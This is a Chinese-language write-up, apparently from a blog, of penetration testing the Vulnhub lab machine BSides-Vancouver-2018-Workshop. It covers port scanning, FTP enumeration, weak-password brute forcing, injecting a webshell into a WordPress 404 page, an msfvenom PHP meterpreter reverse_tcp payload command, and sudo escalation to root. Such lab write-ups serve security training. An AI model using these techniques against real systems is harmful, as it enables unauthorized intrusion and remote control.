靶机渗透测试(BSides):

Vulnhub靶机 BSides-Vancouver-2018-Workshop
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机难度:(初级
目标:成功渗透进入靶机,找到flag.txt,提权到root权限。


渗透流程:

1.探测主机ip:(netdiscover -i eth0 -r 网关)

2.nmap扫描目标主机端口服务:

靶机渗透测试(BSides-Vancouver-2018-Workshop)
目标主机开启了21-ftp,22-ssh,80-http等服务端口;

3.web渗透(80端口)

3.1 进行web目录扫描,dirb ,御剑工具等等;
3.2 探测出含有robots.txt目录,在/robots.txt中发现一个反爬虫目录/backup_wordpress;
3.3 在/backup_wordpresst中发现一个登陆目录/wp-login;
靶机渗透测试(BSides-Vancouver-2018-Workshop)

4.ftp-21端口服务

4.1 ftp://靶机ip
4.2 访问后,发现存在目录遍历漏洞

发现了一个users.txt.bk,里面存储着用户名

靶机渗透测试(BSides-Vancouver-2018-Workshop)

4.3 根据ftp服务得到的用户名进行用户名枚举,弱口令**得到web页面
用户名密码:john(enigma);
靶机渗透测试(BSides-Vancouver-2018-Workshop)

4.4 登陆后制作监听文件(在404页面注入监听木马),开启nc监听在index.php页面写入大马,访问index.php,然后菜刀连接,成功获取shell;
将获得的shell 提升至root 权限
访问/usr/local/bin/cleanup
发现权限很高,可以执行读写;

4.5 也可以使用msf生成木马:

Msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPROT=端口 -f raw > shell.txt

-p 选择payload

-e 选择使用的编码

-i 给payload编码的次数

-b 避免出现的字符

-f 输出文件类型

-o 输出文件目录

将木马上传后,msf设置监听;然后通过输入任意不存在的页面,可触发上传的代码,反弹shell到msf上;最后进行提权操作;

5.ssh-22端口:

5.1 根据ftp服务得到的用户名进行用户名枚举,弱口令**得到ssh连接的用户名密码:anne(princess);

5.2 ssh连接:
靶机渗透测试(BSides-Vancouver-2018-Workshop)
5.3 sudo提权
whoami>发现此时用户为anne,并非root权限
pwd>查看/home/anne
groups>anne sudo
unmae -a
用户anne属于sudo组,可直接进行提权

sudo -i
whoami
root

相关文章:

  • 2021-10-11
  • 2021-10-29
  • 2021-06-23
  • 2021-04-19
  • 2021-08-25
  • 2021-06-16
  • 2021-10-18
  • 2021-07-23
猜你喜欢
  • 2021-09-07
  • 2021-06-16
  • 2021-07-22
  • 2021-09-09
  • 2021-11-11
  • 2021-11-13
  • 2021-12-13
相关资源
相似解决方案